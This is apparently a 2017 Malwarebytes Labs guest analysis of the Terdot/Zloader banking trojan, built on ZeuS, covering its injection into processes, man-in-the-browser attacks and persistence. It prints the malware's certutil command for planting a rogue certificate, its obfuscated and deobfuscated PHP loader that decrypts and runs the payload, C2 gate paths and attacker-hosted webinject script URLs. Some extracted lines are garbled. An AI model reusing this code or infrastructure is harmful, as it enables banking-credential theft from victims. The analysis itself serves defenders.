# Zbot with legitimate applications on board

**blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/**

Malwarebytes Labs January 26, 2017

[Source code of the infamous ZeuS malware leaked in 2011. Since that time, many cybercriminals has adopted it and augmented with their](https://threatpost.com/zeus-source-code-leaked-051011/75217/)
own ideas. Recently, among the payloads delivered by exploit kits, we often find Terdot.A/Zloader – a downloader installing on the victim
machine a ZeuS-based malware.

[The payload is very similar to the malware described in this article and referenced under the name Sphinx. However, after consulting with other](https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/)
[researchers (special thanks to Matthew Mesa), we got proven that the bot that is sold as Sphinx is very different (sample). Since there are](https://twitter.com/mesa_matt)
many confusions about the naming, we decided to stick to the name Terdot Zloader/Zbot.

In this post we will have a look at the features and internals of this malware. As we will see, the dropped package consists not only of malicious
files – but also legitimate applications, used for the malicious purpose.

## Analyzed sample

[d45b8a20a991acd01d2ff63735fc1adf – original executable #1](https://virustotal.com/en/file/952418768f698fc731d52e06a9d25c45486ebc21f31586f025ebe98d6f998f66/analysis/)

[950368afb934fd3fd5b2d4e6704b757b – original executable #2](https://virustotal.com/en/file/c4b894094c08ea234a2a2652f77383f4a22c5402918c330a7ad6f39520dcc53c/analysis/)

[fca092aca679edd9564d00e9640f939d – original executable #3](https://virustotal.com/en/file/9ee649300ee66768afdb2b8866d504e802bd40fd8e4125667bb0f0e2bb6d339f/analysis/)

[ae1d1f4597f76912d7bd9962b96eecbb – loader (unpacked)](https://virustotal.com/en/file/611d0954c55a7cb4471478763fe58aa791dc4bbf345d7b5a96808e6d1d264f96/analysis/)

[268fd83403da27a80ab1a3cf9ac45b67 – payload.dll (injected into explorer)](https://virustotal.com/en/file/bd44645d62f634c5ca65b110b2516bdd22462f8b2f3957dbcd821fa5bdeb38a2/analysis/1483378919/)

[6c34779503414210378371d250a3a1af – client32.dll (Zbot downloaded and injected into msiexec, and into browsers)](https://virustotal.com/en/file/f76e614723432398d1b7d2c4224728204b3bd9c5725e8200a925e8cbf349344c/analysis/1483379079/)

[f9373dc232028da52ad33b017e33bbd3 – original executable #4](https://virustotal.com/en/file/7aa5318a4cf3534ee34f0c542620c03608a95040e8a44ac71150c8e48e6e7ddc/analysis/)

## Distribution

[Most of the analyzed samples were dropped from SundownEK – some of the campaigns are described in details here: 28 Dec 2016,](https://twitter.com/jeromesegura/status/813807695337664512) 6 Jan
2017, and [18 Jan 2017. However, we also encountered cases when the Terdot.A/Zloader was dropped by the malicious email attachment.](http://www.broadanalysis.com/2017/01/18/sundown-exploit-kit-from-88-99-41-189-and-93-190-143-185-delivers-terdot-a-zloader/)

## Behavioral analysis

After the sample is run, we can see it deploying explorer and then terminating. It is easy to guess, that it injected some malicious modules
there.


-----

e attac a debugge to t e e p o e p ocess, e ca see t e jected s e code, a o g t a e e (pay oad d ) e te est g
and unusual thing, typical for this Zloader is, that the DLL does not start at the beginning of the memory page, but after the shellcode:

If we have an internet connection, the Zloader will load the second stage (the main bot) and inject it into msiexec.exe.

The injected module beacons to the CnC and downloads other modules. Observed patterns of the gates:
```
/FE8hVs3/gs98h.php
/bdk/gate.php

```
The communication is encrypted:


-----

C C espo ds t a e e t e odu e o t e a a e (c e t3 _d )_ o oade dec ypts t t e e o y a d jects u t e a te a
while we can see the explorer terminating and another program being deployed: msiexec. The initial malware executable is deleted.

Attaching debugger to msiexec, we can find the Zbot (client32.dll) implanted and running in the process space.

From inside of the injected module another internet connection is made, and some new elements are being downloaded and dropped
(including legitimate applications like certutil and php – their role will be described further). The same client32.dll is also injected in browsers.

The module deployed inside msiexec.exe is used as a supervisor. It opens TCP sockets locally and communicates with the modules injected in
browsers, in order to monitor opened pages.


-----

**MitM**

The main module of the bot downloads and drops some new elements into the %TEMP% folder. Surprisingly, those files are non-malware. We
[can see the certutil application (0c6b43c9602f4d5ac9dcf907103447c4) along with it’s dependencies – legitimate DLLs.](https://technet.microsoft.com/en-us/library/cc732443(v=ws.11).aspx)

In the same folder, there is also some alien certificate (filename, as well as the name of the issuer is randomly generated).


-----

The certificate is installed with the help of the certutil, for the purpose of Man-in-the-Middle attacks (in such cases they are also called Man-inthe-Browser).

Example – a command line deployed during tests:
```
"C:\Users\tester\AppData\Local\Temp\certutil.exe" 
-A -n "otdarufyr" 
-t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" 
-d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"

```
It is easy to guess that this malware targets web browsers. Indeed, if we run a browser and try to visit some site over HTTPS, we will see that
the original certificates are replaced by the malicious one. See examples below – draw attention that the subject of the certificate contains the
valid domain – only the issuer field can let us recognize, that the certificate is not legitimate:

Satander MitB on Firefox:


-----

The browser claims that the connection is secure – but when we see the details, we can find, that the connection is “protected” by the fake
certificate dropped by the malware:

Facebook MitB on InternetExplorer:


-----

Browsers do not alert about any inconsistency – and the user who was not vigilant enough to check the details of the certificate, may easily get
deceived…

If we attach a debbugger into the running browser, we can see that the same client32.dll is injected there – along with some more code used
for API redirections.

**Persistence**

In addition to the content dropped in %TEMP%, we can see some new folders with random names created in %APPDATA%:


-----

Interesting fact is that one of them contains legitimate php.exe (see on VirusTotal: [php.exe,](https://virustotal.com/en/file/0ea0dbcbf78a85b47ec9c98c1fd7c8ff9a71a9986cd6fcf953a1b2f15609d349/analysis/) [php5ts.dll).](https://virustotal.com/en/file/018e13cab4c50261776dc7f641f1c3dd1000cafa21759bac221765663efce806/analysis/)

…and some obfuscated php code:

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in
an editor that reveals hidden Unicode characters.
[Learn more about bidirectional Unicode characters](https://github.co/hiddenchars)

[Show hidden characters](http://10.10.0.46/%7B%7B%20revealButtonHref%20%7D%7D)

<?php $GLOBALS['529399110']=Array('' .'abs','f' .'ile' .'_' .'ge' .'t' .'_c' .'o' .'ntents','file_put' .'_content' .'s','exec','strpos','' .'so' .'cke' .'t_get_sta' .'t'
{$fcfeek=Array("\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb
$fcfeek[$fcvppx];} ?><?php $tmgwczl=-round(0+277703483.2+277703483.2+277703483.2+277703483.2+277703483.2);$erywquk=round(0+84
($pvkdnon);if($dtpcqwi){$mauwmmh=girsztc($dtpcqwi,$tmgwczl);$GLOBALS['529399110'][2]($zzmnlgm,$mauwmmh);$GLOBALS['529399110'
round(0+1114.25+1114.25+1114.25+1114.25))$GLOBALS['529399110'][7]($cuvcjeb,$ujxlctg,$dtpcqwi,$mauwmmh);return($ujxlctg << $jedmsae
{$fnbzhld=_2136181597(7);if((round(0+1.6666666666667+1.6666666666667+1.6666666666667)+round(0+405.75+405.75+405.75+405.75))>
($pvkdnon,$mauwmmh);for($opberbw=round(0);$opberbw<$abwytbw;++$opberbw){$xqnsess=$GLOBALS['529399110'][14]($GLOBALS['5293
($jedmsae,$opberbw))$GLOBALS['529399110'][19]($pvkdnon,$fnbzhld,$opberbw);$tmgwczl=vsqaxzw($tmgwczl,round(0+4+4));++$tmgwczl;}r

[view raw](https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27/raw/6cb379af842ccb54deb917981aac7d3eed86f288/script.php)

[script.php](https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-script-php)

hosted with ❤ by [GitHub](https://github.com/)
(Formatted version [here).](https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-formated-php)

Other folders contains some encrypted data, i.e.:


-----

Interestingly, this php package is referenced at autostart:

Link deploys the dropped php application and runs the script, that we saw before:

We can easily suspect that this is a method of persistence. Deobfuscating the PHP code confirms this guess. See the same code after
cleanup:

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in
an editor that reveals hidden Unicode characters.
[Learn more about bidirectional Unicode characters](https://github.co/hiddenchars)


-----

S o dde c a acte s

<?php

function _get_arr_value($index)

{

$fcfeek = Array(

"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xc

"\x9b\x94\x61\xbd\xaa\xca\x4c\x9a\x86\xc4\x5a\x99\xaf\xd4\x32\xb7\x9d\xc2\x31\xa8\xbc\xc7\x23\xb1\x8c\xdb\x22\x83\xb6\xdb\x23\xb3\xb6\xc
//1

'qsgfh',//2

'ojetjlsjqbudwfx', //3

'oktwz',//4

'ekuwdqoqcadeetv', //5

'nxz', //6

''//7

);

return $fcfeek[$index];

}

?>

<?php

$key = –1388517416;

$erywquk = 3383;

$in_filename = _get_arr_value(0);

$out_filename = _get_arr_value(1);

$in_filename = decode($in_filename, $key);

#$in_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh"

$golkdbl = _get_arr_value(2);

$out_filename = decode($out_filename, $key);

$file_content = file_get_contents($in_filename);

#out_filename = "C:\Users\tester\AppData\Roaming\Vyaxy\royxh.umh.exe"

if ($file_content) {

$decoded_content = decode($file_content, $key);

file_put_contents($out_filename, $decoded_content);

exec($out_filename);

while (!unlink($out_filename))

Sleep(1);

}

function shift_decode($val, $and_val)

{

$k = $and_val & 31;


-----

return ($val << $k) | (($val >> (32 – $k)) & ((1 << (31 & $k)) – 1));

}

function decode($in_buffer, $key)

{

$out_buffer = '';

$input_len = strlen($in_buffer);

for ($index = 0; $index < $input_len; ++$index) {

$decoded_char = chr(ord($in_buffer{$index}) ^ ($key & 0xFF));

$out_buffer .= $decoded_char;

$key = shift_decode($key, 8);

++$key;

}

return $out_buffer;

}

?>

[view raw](https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27/raw/6cb379af842ccb54deb917981aac7d3eed86f288/deobfuscated.php)

[deobfuscated.php](https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-deobfuscated-php)

hosted with ❤ by [GitHub](https://github.com/)
As we can notice, the file royxh.umh contains encrypted code of the malware. Using the presented PHP script it is decrypted back into the
Zloader executable:

[fca092aca679edd9564d00e9640f939d](https://virustotal.com/en/file/9ee649300ee66768afdb2b8866d504e802bd40fd8e4125667bb0f0e2bb6d339f/analysis/)

The dropped file is run and then deleted.

## Inside

**Zloader – payload.dll**

This element – unpacked from the initial sample and injected into explorer.exe – is a downloader – identified as Terdot.A/Zloader. It is
responsible for connecting with the CnC and downloading the main malicious module, that is the Zbot.


-----

**Zbot – client32.dll**

The second stage is also a DLL – this time it is injected into msiexec.exe as well as into browsers:

**Attacked targets**

The bot injects itself into the most popular browsers, in order to hook their API:


-----

It excludes from the attack computers with Russian language installed – but instead of doing it silently, like most of the malware – it is very
openly announcing this fact:

The SQL part

[Inside the bot we can find references to an SQL release from the end of 2016 (see SQLite Release 3.15.1 On 2016-11-04):](https://www.sqlite.org/releaselog/3_15_1.html)
```
2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36

```
Presence of those references confirms, that the bot is pretty new, and probably under active development.

We can also see many SQL queries and related error messages among the strings:


-----

They are used to read and manipulate browser cookies, that are stored in form of SQLite databases.

Queries deployed:


-----

Man-in-the-Browser

The main module injected into msiexec opens local TCP sockets that are used to communicate with the module injected into browser.

All the communication between the browser and particular website is first bypassed by client32.dll injected into msiexec.

Like many Zbots, Terdot not only spy but also allows to modify the displayed content, by “WebInjects” and “WebFakes”.


-----

S tes t at a e go g to be oo ed a e spec ed by co gu at o a p e o t e ta get st o o e o t e sa p es s o s, t at t e a
[interest of the attackers are various banks: https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt](https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt)

Webinjects are implemented by adding malicious scripts (specialized for a specific target) into the content of the website. The scripts are
hosted on the server controlled by attackers. Sample list of the scripts, fetched by the bot during tests:

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in
an editor that reveals hidden Unicode characters.
[Learn more about bidirectional Unicode characters](https://github.co/hiddenchars)

[Show hidden characters](http://10.10.0.46/%7B%7B%20revealButtonHref%20%7D%7D)

https://duckduck2.online/ca/b.js

https://duckduck2.online/ca/d.js

https://duckduck2.online/ca/g.js

https://duckduck2.online/ca/r.js

https://duckduck2.online/pp/paypal.js

https://duckduck2.online/uk/bos.js

https://duckduck2.online/uk/halifax.js

https://duckduck2.online/uk/hsbc.js

https://duckduck2.online/uk/lloyds.js

https://duckduck2.online/uk/nationwide.js

https://duckduck2.online/uk/natwest.js

https://duckduck2.online/uk/rbs.js

https://duckduck2.online/uk/santander.js

https://duckduck2.online/uk/barclays.js

[view raw](https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465/raw/6645fe0fb71b23f4c4446465ee5f7cfe02762967/injects.txt)

[injects.txt](https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-injects-txt)

hosted with ❤ by [GitHub](https://github.com/)
Those java scripts are implanted into the the attacked site before it is displayed in the browser – along with some more, obfuscated code.
[Templates of such implants are downloaded from the CnC server. You can see some examples here.](https://gist.github.com/hasherezade/d06c4235e2ef3eda716ea68ea17c0407)

## Conclusion

Terdot is yet another bot based on Zeus. Feature-wise it is similar to other bankers. However, I think it deserved some attention because of it’s
recent popularity. It has been prepared with attention to details, so we may suspect that it is a work of professionals. It is actively developed,
distributed and maintained – so, the probability is high, that we will be seeing it more in the future.

_This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going_
_[in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:](https://twitter.com/hasherezade)_
_[https://hshrzd.wordpress.com.](https://hshrzd.wordpress.com/)_


-----